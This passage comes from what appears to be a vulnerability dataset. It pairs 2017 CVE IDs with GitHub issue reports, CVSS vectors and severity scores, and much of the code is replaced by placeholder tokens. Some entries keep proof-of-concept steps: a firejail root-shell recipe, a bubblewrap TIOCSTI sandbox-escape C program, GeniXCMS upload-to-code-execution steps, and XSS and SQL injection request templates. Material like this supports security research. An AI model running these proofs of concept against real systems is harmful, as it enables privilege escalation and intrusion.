  12107. "Issue_Url_old": "https://github.com/netblue30/firejail/issues/1023",
  12108. "Issue_Url_new": "https://github.com/netblue30/firejail/issues/1023",
  12109. "Repo_new": "netblue30/firejail",
  12110. "Issue_Created_At": "2017-01-06T23:32:15Z",
  12111. "description": "Root shell via bandwidth and shell. APITAG current HEAD, commit NUMBERTAG In a first window run: $ firejail noprofile name=x net=eth0 In a second window, firstly create a dumb shell that ignores APITAG : $ echo 'int APITAG {system( PATHTAG );}' | gcc xc o dumbshell and then secondly invoke that shell via the APITAG and APITAG flags to obtain root: $ firejail APITAG bandwidth=x status id uid NUMBERTAG root) gid NUMBERTAG root) APITAG APITAG Error occurs at URLTAG char arg NUMBERTAG arg NUMBERTAG APITAG arg NUMBERTAG c\"; arg NUMBERTAG cmd; arg NUMBERTAG NULL; APITAG execvp(arg NUMBERTAG arg); I don't see any good reason to permit a user specified shell to run a bandwidth command.",
  12112. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  12113. "severity": "HIGH",
  12114. "baseScore": 7.8,
  12115. "impactScore": 5.9,
  12116. "exploitabilityScore": 1.8
  12117. },
  12118. {
  12119. "CVE_ID": "CVE-2017-5226",
  12120. "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/142",
  12121. "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/142",
  12122. "Repo_new": "containers/bubblewrap",
  12123. "Issue_Created_At": "2017-01-09T17:17:37Z",
  12124. "description": "CVETAG bubblewrap escape via TIOCSTI ioctl. On Debian bug APITAG , Federico Bento APITAG writes: > When executing a program via the bubblewrap sandbox, the nonpriv > session can escape to the parent session by using the TIOCSTI ioctl to > push characters into the terminal's input buffer, allowing an attacker > to escape the sandbox. > > This has been assigned CVETAG . > > ` > $ cat test.c > include APITAG > include APITAG > include APITAG > > int APITAG > { > char cmd = \"id \"; > while( cmd) > ioctl NUMBERTAG TIOCSTI, cmd++); > execlp( PATHTAG \"id\", NULL); > } > $ gcc test.c o /tmp/test > $ bwrap ro bind /lib NUMBERTAG lib NUMBERTAG ro bind /home /home ro bind /bin /bin > ro bind /tmp /tmp chdir / unshare pid uid NUMBERTAG tmp/test > id > uid NUMBERTAG gid NUMBERTAG groups NUMBERTAG id < did not type this > uid NUMBERTAG saken) gid NUMBERTAG saken) groups NUMBERTAG saken) I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.",
  12125. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  12126. "severity": "CRITICAL",
  12127. "baseScore": 10.0,
  12128. "impactScore": 6.0,
  12129. "exploitabilityScore": 3.9
  12130. },
  12131. {
  12132. "CVE_ID": "CVE-2017-5345",
  12133. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/60",
  12134. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/60",
  12135. "Repo_new": "semplon/genixcms",
  12136. "Issue_Created_At": "2017-01-06T18:44:45Z",
  12137. "description": "safety problem. APITAG CODETAG I think you know this. CODETAG but it need editor. this is my exp: CODETAG APITAG FILETAG",
  12138. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  12139. "severity": "HIGH",
  12140. "baseScore": 8.8,
  12141. "impactScore": 5.9,
  12142. "exploitabilityScore": 2.8
  12143. },
  12144. {
  12145. "CVE_ID": "CVE-2017-5346",
  12146. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/61",
  12147. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/61",
  12148. "Repo_new": "semplon/genixcms",
  12149. "Issue_Created_At": "2017-01-09T10:27:25Z",
  12150. "description": "[sql injection]. [sql injection NUMBERTAG issue1: PATHTAG APITAG exp1: CODETAG NUMBERTAG issue2: PATHTAG APITAG exp2: CODETAG",
  12151. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  12152. "severity": "HIGH",
  12153. "baseScore": 7.2,
  12154. "impactScore": 5.9,
  12155. "exploitabilityScore": 1.2
  12156. },
  12157. {
  12158. "CVE_ID": "CVE-2017-5475",
  12159. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/439",
  12160. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/439",
  12161. "Repo_new": "s9y/serendipity",
  12162. "Issue_Created_At": "2017-01-12T13:44:39Z",
  12163. "description": "Check CSRF token for comment deletion. As reported by Lee Sheldon Victor: We need to utilize a comment token when calling APITAG (via APITAG to protect against CSRF.",
  12164. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12165. "severity": "HIGH",
  12166. "baseScore": 8.8,
  12167. "impactScore": 5.9,
  12168. "exploitabilityScore": 2.8
  12169. },
  12170. {
  12171. "CVE_ID": "CVE-2017-5480",
  12172. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/35",
  12173. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/35",
  12174. "Repo_new": "b2evolution/b2evolution",
  12175. "Issue_Created_At": "2017-01-14T07:27:00Z",
  12176. "description": "Delete or read any files on the server. hi: I found a vulnerability in version NUMBERTAG stable; an attacker can exploit this vulnerability to delete or read any files on the server, and it can also be used to determine whether a file exists. In PATHTAG the parameter APITAG is vulnerable. So an attacker can use PATHTAG to traverse directories. If you want to know more details about the vulnerability, please send me an email. My email is EMAILTAG",
  12177. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  12178. "severity": "HIGH",
  12179. "baseScore": 8.1,
  12180. "impactScore": 5.2,
  12181. "exploitabilityScore": 2.8
  12182. },
  12183. {
  12184. "CVE_ID": "CVE-2017-5494",
  12185. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/34",
  12186. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/34",
  12187. "Repo_new": "b2evolution/b2evolution",
  12188. "Issue_Created_At": "2017-01-14T06:50:16Z",
  12189. "description": "some vulnerabilities. Hi, I found some vulnerabilities in b2evolution CMS\u2019s upload policy. First, uploaded filenames are not modified. It means an attacker can guess where the uploaded file is. Second, comment and avatar allow uploading swf files and the swf file will be executed by flowplayer_plugin. We know we can insert script code in a flash swf, meaning we can achieve code execution through an swf file.",
  12190. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12191. "severity": "MEDIUM",
  12192. "baseScore": 5.4,
  12193. "impactScore": 2.7,
  12194. "exploitabilityScore": 2.3
  12195. },
  12196. {
  12197. "CVE_ID": "CVE-2017-5506",
  12198. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/354",
  12199. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/354",
  12200. "Repo_new": "imagemagick/imagemagick",
  12201. "Issue_Created_At": "2017-01-12T16:59:40Z",
  12202. "description": "Double free memory corruption. Valgrind output: ERRORTAG Backtrace: ERRORTAG APITAG URLTAG URLTAG",
  12203. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12204. "severity": "HIGH",
  12205. "baseScore": 7.8,
  12206. "impactScore": 5.9,
  12207. "exploitabilityScore": 1.8
  12208. },
  12209. {
  12210. "CVE_ID": "CVE-2017-5509",
  12211. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/350",
  12212. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/350",
  12213. "Repo_new": "imagemagick/imagemagick",
  12214. "Issue_Created_At": "2017-01-10T11:40:37Z",
  12215. "description": "memory corruption Out of bound write . Valgrind output: ERRORTAG APITAG APITAG",
  12216. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12217. "severity": "HIGH",
  12218. "baseScore": 7.8,
  12219. "impactScore": 5.9,
  12220. "exploitabilityScore": 1.8
  12221. },
  12222. {
  12223. "CVE_ID": "CVE-2017-5510",
  12224. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/348",
  12225. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/348",
  12226. "Repo_new": "imagemagick/imagemagick",
  12227. "Issue_Created_At": "2017-01-07T18:26:54Z",
  12228. "description": "Memory corruption via a PSB file. CODETAG Valgrind output: ERRORTAG ` APITAG FILETAG",
  12229. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12230. "severity": "HIGH",
  12231. "baseScore": 7.8,
  12232. "impactScore": 5.9,
  12233. "exploitabilityScore": 1.8
  12234. },
  12235. {
  12236. "CVE_ID": "CVE-2017-5511",
  12237. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/347",
  12238. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/347",
  12239. "Repo_new": "imagemagick/imagemagick",
  12240. "Issue_Created_At": "2017-01-07T13:58:27Z",
  12241. "description": "Memory corruption via PSB file. CODETAG Valgrind output: ERRORTAG Backtrace: ERRORTAG APITAG FILETAG",
  12242. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12243. "severity": "CRITICAL",
  12244. "baseScore": 9.8,
  12245. "impactScore": 5.9,
  12246. "exploitabilityScore": 3.9
  12247. },
  12248. {
  12249. "CVE_ID": "CVE-2017-5515",
  12250. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/63",
  12251. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/63",
  12252. "Repo_new": "semplon/genixcms",
  12253. "Issue_Created_At": "2017-01-13T08:17:55Z",
  12254. "description": "Possible XSS Vulnerabilities in User Prompt Function. Data in APITAG and APITAG is passed directly to the DOM without any filtering, resulting in an XSS vulnerability. CODETAG FILETAG Related code URLTAG URLTAG URLTAG URLTAG Untrusted input data arrives in different ways, so filtering at the output node may be a good idea. What's your opinion?",
  12255. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12256. "severity": "MEDIUM",
  12257. "baseScore": 5.4,
  12258. "impactScore": 2.7,
  12259. "exploitabilityScore": 2.3
  12260. },
  12261. {
  12262. "CVE_ID": "CVE-2017-5516",
  12263. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/65",
  12264. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/65",
  12265. "Repo_new": "semplon/genixcms",
  12266. "Issue_Created_At": "2017-01-13T10:41:13Z",
  12267. "description": "Multiple XSS in FILETAG / FILETAG . Source APITAG line NUMBERTAG APITAG line NUMBERTAG APITAG APITAG APITAG FILETAG",
  12268. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12269. "severity": "MEDIUM",
  12270. "baseScore": 6.1,
  12271. "impactScore": 2.7,
  12272. "exploitabilityScore": 2.8
  12273. },
  12274. {
  12275. "CVE_ID": "CVE-2017-5517",
  12276. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/66",
  12277. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/66",
  12278. "Repo_new": "semplon/genixcms",
  12279. "Issue_Created_At": "2017-01-14T08:03:42Z",
  12280. "description": "SQL Injection in APITAG . Source URLTAG CODETAG APITAG APITAG",
  12281. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12282. "severity": "CRITICAL",
  12283. "baseScore": 9.8,
  12284. "impactScore": 5.9,
  12285. "exploitabilityScore": 3.9
  12286. },
  12287. {
  12288. "CVE_ID": "CVE-2017-5518",
  12289. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/64",
  12290. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/64",
  12291. "Repo_new": "semplon/genixcms",
  12292. "Issue_Created_At": "2017-01-13T08:58:32Z",
  12293. "description": "Local URIs Server Side Request Forgery. The media uploader allows the attacker to make the server send a GET request to an intranet address or anything which can be accessed via IP address. FILETAG APITAG FILETAG So basically APITAG installations can send unwanted scrape/scan requests on behalf of their user, invoked by the attacker. Maybe we should rewrite some of the interface in elfinder. Similar CVEs: APITAG NUMBERTAG Local URIs Server Side Request Forgery ( CVETAG ) CVETAG APITAG NUMBERTAG SSRF Bypass using Octal & Hexadecimal IP addresses ( CVETAG ) CVETAG Serendipity SSRF protection bypass using NUMBERTAG redirect CVETAG See how APITAG fixed it: URLTAG URLTAG",
  12294. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  12295. "severity": "HIGH",
  12296. "baseScore": 7.4,
  12297. "impactScore": 4.0,
  12298. "exploitabilityScore": 2.8
  12299. },
  12300. {
  12301. "CVE_ID": "CVE-2017-5519",
  12302. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/67",
  12303. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/67",
  12304. "Repo_new": "semplon/genixcms",
  12305. "Issue_Created_At": "2017-01-14T09:19:56Z",
  12306. "description": "Multiple SQLI caused by functions in APITAG . Source URLTAG Functions APITAG , APITAG and APITAG do not filter any incoming parameters, resulting in many SQL injections. Here is an example. ERRORTAG Injection NUMBERTAG APITAG line NUMBERTAG CODETAG Injection NUMBERTAG APITAG line NUMBERTAG APITAG then APITAG is parsed into APITAG at APITAG line NUMBERTAG ERRORTAG Injection NUMBERTAG APITAG line NUMBERTAG APITAG There are many similar cases, please check it later.",
  12307. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12308. "severity": "CRITICAL",
  12309. "baseScore": 9.8,
  12310. "impactScore": 5.9,
  12311. "exploitabilityScore": 3.9
  12312. },
  12313. {
  12314. "CVE_ID": "CVE-2017-5520",
  12315. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/62",
  12316. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/62",
  12317. "Repo_new": "semplon/genixcms",
  12318. "Issue_Created_At": "2017-01-13T04:42:40Z",
  12319. "description": "Authenticated Remote Command Execution. Version Github latest APITAG NUMBERTAG Login and request APITAG NUMBERTAG Upload an edited png file with php code in it. FILETAG NUMBERTAG Rename ext to APITAG FILETAG FILETAG NUMBERTAG Request uploaded file FILETAG",
  12320. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  12321. "severity": "HIGH",
  12322. "baseScore": 8.8,
  12323. "impactScore": 5.9,
  12324. "exploitabilityScore": 2.8
  12325. },
  12326. {
  12327. "CVE_ID": "CVE-2017-5537",
  12328. "Issue_Url_old": "https://github.com/WeblateOrg/weblate/issues/1317",
  12329. "Issue_Url_new": "https://github.com/weblateorg/weblate/issues/1317",
  12330. "Repo_new": "weblateorg/weblate",
  12331. "Issue_Created_At": "2017-01-09T10:43:05Z",
  12332. "description": "The existence of a weblate account is guessable. Steps to reproduce NUMBERTAG Login to weblate with a valid email, but wrong password Actual behaviour Weblate displays: APITAG with this email address was not found.\" Expected behaviour Weblate displays: APITAG password or username / email address\" Displaying that a user with this email address is not found makes it possible to do user enumeration to figure out if an account exists. Since dumps of password / email address are widely available and password reuse is a thing, displaying if an account is on the server is a valid threat. The login form also does not seem to implement any rate limiting which makes it easy to bruteforce. Server configuration Standard.",
  12333. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  12334. "severity": "MEDIUM",
  12335. "baseScore": 5.3,
  12336. "impactScore": 1.4,
  12337. "exploitabilityScore": 3.9
  12338. },
  12339. {
  12340. "CVE_ID": "CVE-2017-5539",
  12341. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/36",
  12342. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/36",
  12343. "Repo_new": "b2evolution/b2evolution",
  12344. "Issue_Created_At": "2017-01-17T02:30:45Z",
  12345. "description": "traversal directory. hi: I'm sorry to find that this patch for the directory traversal is flawed in version NUMBERTAG stable; an attacker can also exploit this vulnerability to delete or read any files on the server, and it can also be used to determine whether a file exists. I will send you an email for the details. My email is EMAILTAG",
  12346. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  12347. "severity": "CRITICAL",
  12348. "baseScore": 9.1,
  12349. "impactScore": 5.2,
  12350. "exploitabilityScore": 3.9
  12351. },
  12352. {
  12353. "CVE_ID": "CVE-2017-5541",
  12354. "Issue_Url_old": "https://github.com/symphonycms/symphony-2/issues/2639",
  12355. "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2639",
  12356. "Repo_new": "symphonycms/symphonycms",
  12357. "Issue_Created_At": "2017-01-17T03:35:38Z",
  12358. "description": "File Manipulation and Cross Site Scripting in FILETAG . File Manipulation URLTAG APITAG Data from $_POST is passed directly into filepath, so an attacker may control filepath by injecting APITAG . Cross Site Scripting URLTAG ERRORTAG Here data from APITAG to HTML allows an attacker to trigger an XSS with a payload like APITAG",
  12359. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  12360. "severity": "MEDIUM",
  12361. "baseScore": 5.3,
  12362. "impactScore": 1.4,
  12363. "exploitabilityScore": 3.9
  12364. },
  12365. {
  12366. "CVE_ID": "CVE-2017-5543",
  12367. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/297",
  12368. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/297",
  12369. "Repo_new": "intelliants/subrion",
  12370. "Issue_Created_At": "2017-01-17T13:20:39Z",
  12371. "description": "Authorized PHP Object Injection. URLTAG ERRORTAG When ERRORTAG is used on user supplied data it often leads to PHP Object Injection. Attacker may generate a string of serialized object and parse it to server backend via APITAG by submitting a login request . Then func ERRORTAG will trigger APITAG and APITAG method in serialized obj, resulting in code execution. Please check other places where the function ERRORTAG is used.",
  12372. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12373. "severity": "CRITICAL",
  12374. "baseScore": 9.8,
  12375. "impactScore": 5.9,
  12376. "exploitabilityScore": 3.9
  12377. },
  12378. {
  12379. "CVE_ID": "CVE-2017-5545",
  12380. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/87",
  12381. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/87",
  12382. "Repo_new": "libimobiledevice/libplist",
  12383. "Issue_Created_At": "2017-01-17T03:56:21Z",
  12384. "description": "APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG d7 at pc NUMBERTAG a NUMBERTAG c bp NUMBERTAG bf NUMBERTAG sp NUMBERTAG bf NUMBERTAG c. I found a heap buffer overflow vulnerability. Should I submit it here and can it be assigned a CVE ID if validated? Should I submit poc after the report is closed? Thanks, here is the stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG d7 at pc NUMBERTAG a NUMBERTAG c bp NUMBERTAG bf NUMBERTAG sp NUMBERTAG bf NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG d7 thread T NUMBERTAG a NUMBERTAG b in main PATHTAG NUMBERTAG b5f7fa NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG d7 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b5e NUMBERTAG d NUMBERTAG b5e NUMBERTAG d3) allocated by thread T0 here NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG ae in main PATHTAG NUMBERTAG b5f7fa NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG",
  12385. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  12386. "severity": "CRITICAL",
  12387. "baseScore": 9.1,
  12388. "impactScore": 5.2,
  12389. "exploitabilityScore": 3.9
  12390. },
  12391. {
  12392. "CVE_ID": "CVE-2017-5574",
  12393. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/69",
  12394. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/69",
  12395. "Repo_new": "semplon/genixcms",
  12396. "Issue_Created_At": "2017-01-20T11:03:40Z",
  12397. "description": "SQL injection in FILETAG APITAG NUMBERTAG latest version). FILETAG CODETAG the activation param leads to a SQL injection vulnerability. POC: CODETAG We'll find the database version in the response page, which proves the vulnerability exists. By the way, if you can help me apply for a CVE ID, I will be very grateful. XD",
  12398. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12399. "severity": "CRITICAL",
  12400. "baseScore": 9.8,
  12401. "impactScore": 5.9,
  12402. "exploitabilityScore": 3.9
  12403. },
  12404. {
  12405. "CVE_ID": "CVE-2017-5575",
  12406. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/68",
  12407. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/68",
  12408. "Repo_new": "semplon/genixcms",
  12409. "Issue_Created_At": "2017-01-19T05:59:56Z",
  12410. "description": "SQL Injection in APITAG . FILETAG ERRORTAG options SET value APITAG name CODETAG options SET value APITAG name APITAG POC: first, access FILETAG to get a token: APITAG then access the following: CODETAG We'll find that the page sleeps NUMBERTAG seconds, which proves the vulnerability exists.",
  12411. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12412. "severity": "CRITICAL",
  12413. "baseScore": 9.8,
  12414. "impactScore": 5.9,
  12415. "exploitabilityScore": 3.9
  12416. },
  12417. {
  12418. "CVE_ID": "CVE-2017-5608",
  12419. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/600",
  12420. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/600",
  12421. "Repo_new": "piwigo/piwigo",
  12422. "Issue_Created_At": "2017-01-04T05:26:39Z",
  12423. "description": "Cross Site Scripting in image upload.. Latest Version of piwigo is vulnerable to cross site scripting vulnerability in the image upload function, The filename of image can be crafted with malicious payload,which in turn executes while viewing the image. HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: x.x.x.x:xxxx User Agent: Mozilla NUMBERTAG Ubuntu; Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Length NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Cookie: APITAG APITAG cid NUMBERTAG APITAG Connection: close NUMBERTAG Content Disposition: form data; name=\"name\" test NUMBERTAG Content Disposition: form data; name=\"chunk NUMBERTAG Content Disposition: form data; name=\"chunks NUMBERTAG Content Disposition: form data; name=\"category NUMBERTAG Content Disposition: form data; name=\"level NUMBERTAG Content Disposition: form data; name=\"pwg_token\" APITAG NUMBERTAG Content Disposition: form data; name=\"file\"; filename=\" payloadhere .png\" Content Type: image/png Malicious script can be passed in the payloadhere section",
  12424. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12425. "severity": "MEDIUM",
  12426. "baseScore": 6.1,
  12427. "impactScore": 2.7,
  12428. "exploitabilityScore": 2.8
  12429. },
  12430. {
  12431. "CVE_ID": "CVE-2017-5617",
  12432. "Issue_Url_old": "https://github.com/blackears/svgSalamander/issues/11",
  12433. "Issue_Url_new": "https://github.com/blackears/svgsalamander/issues/11",
  12434. "Repo_new": "blackears/svgsalamander",
  12435. "Issue_Created_At": "2017-01-27T07:34:16Z",
  12436. "description": "SSRF APITAG Side Request Forgery) is possible. If the library is being used in a web application for processing user supplied SVG files then the app is vulnerable to SSRF. The attacker can send a specially crafted svg file, for example %% APITAG APITAG APITAG %% and the lib will send the request inside the trusted network to the APITAG (bypassing the firewall). In general, the attacker can use any scheme supported by default (such as APITAG , APITAG etc) or use application specific scheme. How to fix any schemes apart from data in the APITAG attribute should be disallowed by default at URLTAG Additional information: CVETAG URLTAG",
  12437. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  12438. "severity": "HIGH",
  12439. "baseScore": 7.4,
  12440. "impactScore": 4.0,
  12441. "exploitabilityScore": 2.8
  12442. },
  12443. {
  12444. "CVE_ID": "CVE-2017-5638",
  12445. "Issue_Url_old": "https://github.com/rapid7/metasploit-framework/issues/8064",
  12446. "Issue_Url_new": "https://github.com/rapid7/metasploit-framework/issues/8064",
  12447. "Repo_new": "rapid7/metasploit-framework",
  12448. "Issue_Created_At": "2017-03-07T06:21:03Z",
  12449. "description": "CVETAG Apache Struts2 S NUMBERTAG Possible Remote Code Execution when performing file upload based on Jakarta Multipart parser. ... > It is possible to perform a RCE attack with a malicious Content Type value. If the Content Type value isn't valid an exception is thrown which is then used to display an error message to a user. ERRORTAG References URLTAG URLTAG",
  12450. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  12451. "severity": "CRITICAL",
  12452. "baseScore": 10.0,
  12453. "impactScore": 6.0,
  12454. "exploitabilityScore": 3.9
  12455. },
  12456. {
  12457. "CVE_ID": "CVE-2017-5834",
  12458. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/89",
  12459. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/89",
  12460. "Repo_new": "libimobiledevice/libplist",
  12461. "Issue_Created_At": "2017-01-18T02:20:02Z",
  12462. "description": "heap buffer overflow in parse_dict_node NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b NUMBERTAG c1a at pc NUMBERTAG a0 bp NUMBERTAG bffd NUMBERTAG sp NUMBERTAG bffd NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b NUMBERTAG c1a thread T NUMBERTAG f in parse_array_node PATHTAG NUMBERTAG f in parse_bin_node PATHTAG NUMBERTAG a0f3 in parse_bin_node_at_index PATHTAG NUMBERTAG b NUMBERTAG e in plist_from_bin PATHTAG NUMBERTAG a1c4 in main PATHTAG NUMBERTAG b NUMBERTAG ba NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG NUMBERTAG b NUMBERTAG c1a is located NUMBERTAG bytes to the right of NUMBERTAG byte region FILETAG",
  12463. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  12464. "severity": "MEDIUM",
  12465. "baseScore": 5.5,
  12466. "impactScore": 3.6,
  12467. "exploitabilityScore": 1.8
  12468. },
  12469. {
  12470. "CVE_ID": "CVE-2017-5836",
  12471. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/86",
  12472. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/86",
  12473. "Repo_new": "libimobiledevice/libplist",
  12474. "Issue_Created_At": "2017-01-15T15:44:18Z",
  12475. "description": "Issue in plist_free_data APITAG ERRORTAG Sample base NUMBERTAG APITAG",
  12476. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12477. "severity": "HIGH",
  12478. "baseScore": 7.5,
  12479. "impactScore": 3.6,
  12480. "exploitabilityScore": 3.9
  12481. },
  12482. {
  12483. "CVE_ID": "CVE-2017-5875",
  12484. "Issue_Url_old": "https://github.com/dotCMS/core/issues/10643",
  12485. "Issue_Url_new": "https://github.com/dotcms/core/issues/10643",
  12486. "Repo_new": "dotcms/core",
  12487. "Issue_Created_At": "2017-02-06T09:17:56Z",
  12488. "description": "Multiple XSS in APITAG NUMBERTAG Expected Behavior Current Behavior Possible Solution Known Workarounds Steps to Reproduce (for bugs NUMBERTAG Context Your Environment APITAG version used: Browser Name and version: Operating System and version: Application Server and version: Java Brand and version: Database and version: Application module (if apply): The server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser. XSS CVETAG APITAG Necessary): POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: es ES,es; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG opvc NUMBERTAG b4f NUMBERTAG adbd NUMBERTAG d6 a NUMBERTAG b d NUMBERTAG a NUMBERTAG fa; sitevisitscookie NUMBERTAG dmid NUMBERTAG f NUMBERTAG d1c NUMBERTAG c NUMBERTAG a NUMBERTAG bb NUMBERTAG APITAG APITAG APITAG APITAG Dl; _gat NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG APITAG APITAG APITAG FILETAG XSS CVETAG : GET PATHTAG APITAG f6ba NUMBERTAG b NUMBERTAG adef NUMBERTAG b7ed NUMBERTAG a NUMBERTAG HTTP NUMBERTAG FILETAG XSS CVETAG : GET PATHTAG APITAG FILETAG How to fix: URLTAG",
  12489. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12490. "severity": "MEDIUM",
  12491. "baseScore": 5.4,
  12492. "impactScore": 2.7,
  12493. "exploitabilityScore": 2.3
  12494. },
  12495. {
  12496. "CVE_ID": "CVE-2017-5879",
